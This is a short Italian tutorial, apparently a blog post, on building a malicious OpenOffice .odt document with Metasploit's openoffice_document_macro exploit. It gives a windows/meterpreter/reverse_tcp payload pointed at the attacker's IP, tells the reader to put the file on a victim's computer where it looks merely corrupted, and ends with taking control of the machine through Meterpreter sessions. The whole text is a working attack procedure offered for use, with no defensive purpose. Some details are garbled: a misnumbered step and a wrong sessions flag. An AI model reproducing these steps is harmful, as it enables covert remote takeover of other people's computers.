Come hackerare Windows con un file World

Windows è sicuramente un buon sistema, ma poco sicuro.

Per esempio, hai mai pensato che un file ODT potesse essere una backdoor invece che semplicemente corrotto?

Oggi ti mostrerò come creare un file .odt infetto con Kali Linux

1) Clicca sull'icona del Terminale e configuralo per il Metasploit Framework in questo modo:

     # service postgresql start

     e Apri la sessione di Metasploit con

     # msfconsole

2) Ora dovrai  utilizzare l'exploit per OpenOffice

    # use exploit/multi/misc/openoffice_document_macro

3)Ora configuriamo l'exploit con Il nome del server, il nome del file, Payload e il tuo indirizzo ip per ricevere le        informazioni:

   # set SRVHOST [indirizzo_ip_dell_hacker]

   # set FILENAME [nome_file].odt

   # set PAYLOAD Windows/meterpreter/reverse_tcp

   # set LHOST [indirizzo_ip_hacker]

   # run

3)Metasploit creerà il file nella cartella /root/.msf4/local/ , dovrai solo caricare il file sul computer della vittima e aprirlo. Sembrerà solo un file corrotto! Dal tuo terminale dovrai solo selezionare la sessione con

   # sessions -i

   # sessions -l [numero_sessione]

4) Ora il pc sarà sotto il tuo comando!